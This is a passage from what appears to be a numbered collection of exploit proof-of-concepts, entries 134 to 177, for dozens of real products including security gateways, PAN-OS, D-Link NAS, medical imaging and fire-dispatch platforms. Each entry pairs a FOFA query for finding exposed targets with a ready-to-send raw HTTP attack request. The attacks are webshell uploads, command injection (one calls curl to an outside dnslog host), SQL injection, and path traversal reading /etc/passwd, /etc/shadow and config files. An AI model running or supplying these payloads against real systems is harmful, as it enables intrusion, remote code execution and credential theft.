FOFA:body="/public/qbsp.php"
POST /admin/commodtiy/file.php?upload=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFQqYtrIWb8iBxUCx

------WebKitFormBoundaryFQqYtrIWb8iBxUCx
Content-Disposition: form-data; name="file"; filename="rce.php"
Content-Type: application/octet-stream

<?php system("cat /etc/passwd");unlink(__FILE__);?>
------WebKitFormBoundaryFQqYtrIWb8iBxUCx--

134. Netentsec (网康) NS-ASG application security gateway index.php SQL injection
CVE-2024-2330
Affected: Netentsec NS-ASG Application Security Gateway 6.3
FOFA:app="网康科技-NS-ASG安全网关"
POST /protocol/index.php HTTP/1.1
Host: x.x.x.x
Cookie: PHPSESSID=bfd2e9f9df564de5860117a93ecd82de
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 263

jsoncontent={"protocolType":"addmacbind","messagecontent":["{\"BandIPMacId\":\"1\",\"IPAddr\":\"eth0'and(updatexml(1,concat(0x7e,(select+version())),1))='\",\"MacAddr\":\"\",\"DestIP\":\"\",\"DestMask\":\"255.255.255.0\",\"Description\":\"Sample+Description\"}"]}

135. Netentsec (网康) NS-ASG application security gateway list_ipAddressPolicy.php SQL injection
CVE-2024-2022
Affected: Netentsec NS-ASG Application Security Gateway 6.3
FOFA:app="网康科技-NS-ASG安全网关"
GET /admin/list_ipAddressPolicy.php?GroupId=-1+UNION+ALL+SELECT+EXTRACTVALUE(1,concat(0x7e,(select+md5(102103122)),0x7e)) HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

136. NextChat cors SSRF
CVE-2023-49785
FOFA:title="NextChat"
GET /api/cors/http:%2f%2fnextchat.kr9dqoau.dnslog.pw%23 HTTP/1.1
Host: x.x.x.x:10000
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

137. Fujian Kelixun (福建科立讯) communication command and dispatch platform down_file.php SQL injection
CVE-2024-2620
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/down_file.php?uuid=1%27%20AND%20(SELECT%205587%20FROM%20(SELECT(SLEEP(5)))pwaA)%20AND%20%27dDhF%27=%27dDhF HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=uksj
Upgrade-Insecure-Requests: 1

138. Fujian Kelixun (福建科立讯) communication command and dispatch platform pwd_update.php SQL injection
CVE-2024-2621
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/user/pwd_update.php?usr_number=1%27%20AND%20(SELECT%207872%20FROM%20(SELECT(SLEEP(5)))DHhu)%20AND%20%27pMGM%27=%27pMGM&new_password=1&sign=1 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Upgrade-Insecure-Requests: 1

139. Fujian Kelixun (福建科立讯) communication command and dispatch platform editemedia.php SQL injection
CVE-2024-2622
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/editemedia.php?enterprise_uuid=1%27%20AND%20(SELECT%203257%20FROM%20(SELECT(SLEEP(5)))JPVs)%20AND%20%27gDyM%27=%27gDyM HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=cybk
Upgrade-Insecure-Requests: 1

140. Fujian Kelixun (福建科立讯) communication command and dispatch platform get_extension_yl.php SQL injection
CVE-2024-2566
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/get_extension_yl.php?imei=1%27%20AND%20(SELECT%207545%20FROM%20(SELECT(SLEEP(5)))Zjzw)%20AND%20%27czva%27=%27czva&timestamp=1&sign=1 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: authcode=h8g9
Upgrade-Insecure-Requests: 1

141. Fujian Kelixun (福建科立讯) communication command and dispatch management platform ajax_users.php SQL injection
FOFA:body="指挥调度管理平台"
POST /app/ext/ajax_users.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info
Content-Type: application/x-www-form-urlencoded

dep_level=1') UNION ALL SELECT NULL,CONCAT(0x7e,md5(1),0x7e),NULL,NULL,NULL-- -

142. CMSV6 vehicle monitoring platform weak password
CVE-2024-29666
FOFA:body="/808gps/"
admin/admin

143. Netis WF2780 v2.1.40144 remote command execution
CVE-2024-25850
FOFA:title='AP setup' && header='netis'
PAYLOAD

144. D-Link nas_sharing.cgi command injection
FOFA:app="D_Link-DNS-ShareCenter"
The system parameter carries the command to be executed.
GET /cgi-bin/nas_sharing.cgi?user=mydlinkBRionyg&passwd=YWJjMTIzNDVjYmE&cmd=15&system=aWQ= HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

145. Palo Alto Networks PAN-OS GlobalProtect command injection
CVE-2024-3400
FOFA:icon_hash="-631559155"
GET /global-protect/login.esp HTTP/1.1
Host: 192.168.30.112:1005
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84
Connection: close
Cookie: SESSID=/../../../opt/panlogs/tmp/device_telemetry/minute/hellothere226`curl${IFS}dnslog地址`;
Accept-Encoding: gzip

146. MajorDoMo thumb.php unauthenticated remote code execution
CNVD-2024-02175
FOFA:app="MajordomoSL"
GET /modules/thumb/thumb.php?url=cnRzcDovL2EK&debug=1&transport=%7C%7C+%28echo+%27%5BS%5D%27%3B+id%3B+echo+%27%5BE%5D%27%29%23%3B HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

147. RaidenMAILD mail server v.4.9.4 path traversal
CVE-2024-32399
FOFA:body="RaidenMAILD"
GET /webeditor/../../../windows/win.ini HTTP/1.1
Host: 127.0.0.1:81
Cache-Control: max-age=0
Connection: close

148. CrushFTP authentication bypass / template injection
CVE-2024-4040
FOFA:body="CrushFTP"
PAYLOAD

149. AJ-Report open-source data dashboard remote command execution
FOFA:title="AJ-Report"

POST /dataSetParam/verification;swagger-ui/ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Content-Type: application/json;charset=UTF-8
Connection: close

{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"ipconfig\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}

150. AJ-Report 1.4.0 authentication bypass and remote code execution
FOFA:title="AJ-Report"
POST /dataSetParam/verification;swagger-ui/ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Content-Type: application/json;charset=UTF-8
Connection: close
Content-Length: 339

{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"id\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}

151. AJ-Report 1.4.1 pageList SQL injection
FOFA:title="AJ-Report"
GET /;swagger-ui/dataSource/pageList?showMoreSearch=false&pageNumber=1&pageSize=10 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Accept-Encoding: gzip

152. Progress Kemp LoadMaster remote command execution
CVE-2024-1212
LoadMaster <= 7.2.59.2 (GA)
LoadMaster <= 7.2.54.8 (LTSF)
LoadMaster <= 7.2.48.10 (LTS)
FOFA:body="LoadMaster"
JztsczsnOmRvZXNub3RtYXR0ZXI= is the base64 encoding of ';ls;':doesnotmatter
GET /access/set?param=enableapi&value=1 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/604.1 (KHTML, like Gecko) Version/9.1.2 Safari/604.1
Connection: close
Accept: */*
Accept-Language: en
Authorization: Basic JztsczsnOmRvZXNub3RtYXR0ZXI=
Accept-Encoding: gzip

153. gradio arbitrary file read
CVE-2024-1561
FOFA:body="__gradio_mode__"
Step 1: request /config to obtain the component ids
http://x.x.x.x/config

Step 2: write the contents of /etc/passwd to a temporary file
POST /component_server HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.3 Safari/605.1.1514.1.3 Ddg/14.1.3
Connection: close
Content-Length: 115
Content-Type: application/json
Accept-Encoding: gzip

{"component_id": "1","data": "/etc/passwd","fn_name": "move_resource_to_block_cache","session_hash": "aaaaaaaaaaa"}

Step 3: access
http://x.x.x.x/file=/tmp/gradio/ ... 8cdf49755073/passwd

154. Tianweier (天维尔) fire rescue operations dispatch platform SQL injection
CVE-2024-3720
FOFA:body="天维尔信息科技股份有限公司" && title=="登入"
POST /twms-service-mfs/mfsNotice/page HTTP/1.1
Host: x.x.x.x
Content-Length: 106
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://x.x.x.x
Content-Type: application/json
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://x.x.x.x/twms-service-mfs/mfsNotice/page
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

{"currentPage":1,"pageSize":19,"query":{"gsdwid":"1f95b3ec41464ee8b8f223cc41847930') AND 7120=(SELECT 7120 FROM PG_SLEEP(5)) AND ('dZAi'='dZAi"},"hgubmt748n4":"="}

155. LyLme Spage (六零导航页) file.php arbitrary file upload
CVE-2024-34982
FOFA:title=="上网导航 - LyLme Spage"
POST /include/file.php HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Connection: close
Content-Length: 232
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: multipart/form-data; boundary=---------------------------qttl7vemrsold314zg0f
X-Requested-With: XMLHttpRequest

-----------------------------qttl7vemrsold314zg0f
Content-Disposition: form-data; name="file"; filename="test.php"
Content-Type: image/png

<?php phpinfo();unlink(__FILE__);?>
-----------------------------qttl7vemrsold314zg0f--

Access the uploaded file: http://x.x.x.x/files/upload/img_664ab7fd14d2c.php

156. TBK DVR-4104/DVR-4216 OS command injection
CVE-2024-3721
FOFA:"Location: /login.rsp"
·TBK DVR-4104
·TBK DVR-4216
curl "http://<dvr_host>:<port>/device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=<URL_ENCODED_SHELL_COMMAND>" -H "Cookie: uid=1"

POST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=echo%3B%20echo%20asrgkjh0%20%3E%20%2Fvar%2Fexample.txt%3B%20ls%20-l%20%2Fvar%3B%20echo%20----------------%3B%20cat%20%2Fvar%2Fexample.txt%3B HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh;T2lkQm95X0c= Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 0
Cookie: uid=1
Accept-Encoding: gzip

157. 美特CRM upload.jsp arbitrary file upload
CNVD-2023-06971
FOFA:body="/common/scripts/basic.js"
POST /develop/systparam/softlogo/upload.jsp?key=null&form=null&field=null&filetitle=null&folder=null HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Content-Length: 709
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cache-Control: max-age=0
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary1imovELzPsfzp5dN
Upgrade-Insecure-Requests: 1

------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="file"; filename="kjldycpvjrm.jsp"
Content-Type: application/octet-stream

nyhelxrutzwhrsvsrafb
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="key"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="form"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="field"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="filetitile"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="filefolder"

null
------WebKitFormBoundary1imovELzPsfzp5dN--

http://x.x.x.x/userfile/default/userlogo/kjldycpvjrm.jsp

158. Mura-CMS processAsyncObject SQL injection
CVE-2024-32640
FOFA:"Generator: Masa CMS"
POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded

object=displayregion&contenthistid=x\'&previewid=1

159. 英飞达 medical image archiving and communication system (PACS) WebJobUpload arbitrary file upload
FOFA:"INFINITT" && (icon_hash="1474455751"|| icon_hash="702238928")
POST /webservices/WebJobUpload.asmx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Content-Length: 1080
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: text/xml; charset=utf-8
Soapaction: "http://rainier/jobUpload"

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<jobUpload xmlns="http://rainier">
<vcode>1</vcode>
<subFolder></subFolder>
<fileName>abcrce.asmx</fileName>
<bufValue>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</bufValue>
</jobUpload>
</soap:Body>
</soap:Envelope>

/1/abcrce.asmx/Cmdshell?Pass=Response.Write("Hello,World")

160. Sonatype Nexus Repository 3 directory traversal and file read
CVE-2024-4956
FOFA:title="Nexus Repository Manager"
GET /%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:21.0) Gecko/20100101 Firefox/21.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

161. 科拓 fully intelligent parking fee system Webservice.asmx arbitrary file upload
FOFA:body="/KT_Css/qd_defaul.css"
Step 1: upload the file. The <fileName> field specifies the file name and the <fileFlow> field the file content, which must be base64-encoded.
POST /Webservice.asmx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
Connection: close
Content-Length: 445
Content-Type: text/xml
Accept-Encoding: gzip

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<UploadResume xmlns="http://tempuri.org/">
<ip>1</ip>
<fileName>../../../../dizxdell.aspx</fileName>
<fileFlow>andqbmFnc3phc3d1ZGh0bmhwYXc=</fileFlow>
<tag>3</tag>
</UploadResume>
</soap:Body>
</soap:Envelope>

http://x.x.x.x/dizxdell.aspx

162. 和丰 multimedia information publishing system QH.aspx arbitrary file upload
FOFA: app="和丰山海-数字标牌"
POST /QH.aspx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
Connection: close
Content-Length: 583
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryeegvclmyurlotuey
Accept-Encoding: gzip

------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="fileToUpload"; filename="kjuhitjgk.aspx"
Content-Type: application/octet-stream

<% response.write("ujidwqfuuqjalgkvrpqy") %>
------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="action"

upload
------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="responderId"

ResourceNewResponder
------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="remotePath"

/opt/resources
------WebKitFormBoundaryeegvclmyurlotuey--

http://x.x.x.x/opt/resources/kjuhitjgk.aspx

163. 号卡极团 distribution management system ue_serve.php arbitrary file upload
FOFA: icon_hash="-795291075"
POST /admin/controller/ue_serve.php?action=image&encode=utf-8 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
Connection: close
Content-Length: 293
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Content-Type: multipart/form-data; boundary=----iiqvnofupvhdyrcoqyuujyetjvqgocod

------iiqvnofupvhdyrcoqyuujyetjvqgocod
Content-Disposition: form-data; name="name"

1.php
------iiqvnofupvhdyrcoqyuujyetjvqgocod
Content-Disposition: form-data; name="upfile"; filename="1.php"
Content-Type: image/jpeg

rvjhvbhwwuooyiioxega
------iiqvnofupvhdyrcoqyuujyetjvqgocod--

164. 慧校园(安校易) management system FileUpProductupdate.aspx arbitrary file upload
FOFA: title="智慧综合管理平台登入"
POST /Module/FileUpPage/FileUpProductupdate.aspx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
Content-Length: 288
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: multipart/form-data; boundary=----dqdaieopnozbkapjacdbdthlvtlyl
X-Requested-With: XMLHttpRequest
Accept-Encoding: gzip

------dqdaieopnozbkapjacdbdthlvtlyl
Content-Disposition: form-data; name="Filedata"; filename="qaz.aspx"
Content-Type: image/jpeg

<%@Page Language="C#"%><%Response.Write("aitwpovoxwtgixpfqiys");System.IO.File.Delete(Request.PhysicalPath);%>
------dqdaieopnozbkapjacdbdthlvtlyl--

http://x.x.x.x/Upload/Publish/000000/0_0_0_0/update.aspx

165. OrangeHRM 3.3.3 SQL injection
CVE-2024-36428
FOFA: app="OrangeHRM-产品"
URL:https://192.168.1.28/symfony/web ... e&sortOrder=ASC,(SELECT (CASE WHEN (5240=5240) THEN 1 ELSE 5240*(SELECT 5240 FROM INFORMATION_SCHEMA.PLUGINS) END))

166. 中成科信 ticketing management platform SeatMapHandler SQL injection
FOFA:body="技术支持:北京中成科信科技发展有限公司"
POST /SystemManager/Comm/SeatMapHandler.ashx HTTP/1.1
Host:
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: ASPSESSIONIDCCRBRCTD=LHLBDIBAKDEGBCJGKIKMNODE
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 89

Method=GetZoneInfo&solutionNo=%27+AND+4172+IN+%28SELECT+%28CHAR%28104%29%2BCHAR%28101%29%2BCHAR%28108%29%2BCHAR%28108%29%2BCHAR%28111%29%29%29--+bErE

167. 精益 value management system DownLoad.aspx arbitrary file read
FOFA:body="/ajax/LVS.Core.Common.STSResult,LVS.Core.Common.ashx"
GET /Business/DownLoad.aspx?p=UploadFile/../Web.Config HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

168. 宏景EHR OutputCode arbitrary file read
FOFA:app="HJSOFT-HCM"
GET /servlet/OutputCode?path=VHmj0PAATTP2HJBPAATTPcyRcHb6hPAATTP2HJFPAATTP59XObqwUZaPAATTP2HJBPAATTP6EvXjT HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Connection: close

169. 宏景EHR downlawbase SQL injection
FOFA:app="HJSOFT-HCM"
GET /templates/attestation/../../selfservice/lawbase/downlawbase?id=1';WAITFOR+DELAY+'0:0:5'--+ HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close

170. 宏景EHR DisplayExcelCustomReport arbitrary file read
FOFA:body="/general/sys/hjaxmanage.js"
POST /templates/attestation/../../servlet/DisplayExcelCustomReport HTTP/1.1
Host: balalanengliang
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded

filename=../webapps/ROOT/WEB-INF/web.xml

171. 通天星CMSV6 vehicle positioning and monitoring platform SQL injection
FOFA:body="/808gps/"
GET /run_stop/delete.do;downloadLogger.action?ids=1)+AND+(SELECT+5394+FROM+(SELECT(SLEEP(5)))tdpw)--+&loadAll=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close

172. DT HD license-plate recognition camera arbitrary file read
FOFA:app="DT-高清车牌识别摄像机"
GET /../../../../etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

173. Check Point security gateway arbitrary file read
CVE-2024-24919
FOFA:app="Check_Point-SSL-Network-Extender"
POST /clients/MyCRL HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded

aCSHELL/../../../../../../../etc/shadow

174. 金和OA C6 FileDownLoad.aspx arbitrary file read
FOFA:app="金和网络-金和OA"
GET /c6/JHSoft.Web.CustomQuery/FileDownLoad.aspx?FilePath=../Resource/JHFileConfig.ini HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close

175. 金和OA C6 IncentivePlanFulfill.aspx SQL injection
FOFA:app="金和网络-金和OA"
GET /C6/JHSoft.Web.IncentivePlan/IncentivePlanFulfill.aspx/?IncentiveID=1%20WAITFOR%20DELAY%20'0:0:5'--&TVersion=1 HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

176. Telecom gateway configuration management system rewrite.php file upload
FOFA:body="img/login_bg3.png" && body="系统登录"
POST /manager/teletext/material/rewrite.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryOKldnDPT
Connection: close

------WebKitFormBoundaryOKldnDPT
Content-Disposition: form-data; name="tmp_name"; filename="test.php"
Content-Type: image/png

<?php system("cat /etc/passwd");unlink(__FILE__);?>
------WebKitFormBoundaryOKldnDPT
Content-Disposition: form-data; name="uploadtime"


------WebKitFormBoundaryOKldnDPT--

177. H3C router sensitive information disclosure
/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg
/userLogin.asp/../actionpolicy_status/../M60.cfg
/userLogin.asp/../actionpolicy_status/../GR8300.cfg
/userLogin.asp/../actionpolicy_status/../GR5200.cfg
/userLogin.asp/../actionpolicy_status/../GR3200.cfg
/userLogin.asp/../actionpolicy_status/../GR2200.cfg
/userLogin.asp/../actionpolicy_status/../ER8300G2-X.cfg
